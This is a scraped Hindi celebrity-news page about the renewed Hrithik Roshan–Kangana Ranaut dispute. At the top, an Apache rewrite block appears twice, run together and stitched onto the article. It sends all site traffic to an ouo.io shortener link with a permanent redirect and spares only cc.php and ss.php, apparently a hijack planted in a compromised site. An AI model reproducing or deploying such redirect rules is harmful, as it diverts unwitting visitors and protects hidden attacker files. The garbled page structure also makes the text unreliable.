
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 378
Previous Nextमुंबई। ऋतिक रोशन का नाम ऐसा हो गया है कि बिना इनके कंगना की कंट्रोवर्सी के चर्चे पूरे ही नहीं होते। साल 2017 में भी इन दोनों का किस्सा हर तरफ छाया रहा। इसकी वजह बनी फिल्म प्रमोशन के दौरान कंगना की बेबाकी। कंगना के बयानों से ऋतिक इतने आहत हो गए थे कि उन्होंने आखिर में एक लंबे-चौड़े लेटर के जरिए अपने दिल की बात रखी थी। इस सारे मामले की असल शुरुआत साल 2016 में हुई थी। कंगना और ऋतिक एक दूसरे कई तरह के आरोप लगा रहे थे लेकिन कोई नहीं जानता था कि सच क्या है? करीब 11 महीने बाद जब मुंबई पुलिस ने केस बिना किसी नतीजे के बंद कर दिया और मीडिया में खबरें आईं कि ऋतिक और कंगना इस विवाद को आपसी सहमति से सुलझाने के लिए तैयार हो गए हैं तब सबने राहत की सांस ली थी। तब ये मान लिया गया था कि ऋतिक और कंगना के बीच झगड़ा खत्म हो चुका है। लेकिन अब कंगना रनौत के एक बयान ने फिर से दोनों के बीच 11 महीनों तक चले विवाद की यादें ताजा कर दी हैं। दरअसल कंगना ने एक इंटरव्यू में बिना ऋतिक का नाम लिए कहा है कि उन्हें उनसे माफी मांगनी चाहिए। सवाल ये है कि क्या कंगना का ये बयान एक बार फिर दोनों के बीच नई लड़ाई की शुरुआत की वजह बनेगा? इस सवाल का जवाब आपको दोनों के बीच लंबे वक्त तक चले विवाद पर एक नजर डालकर मिल सकता है।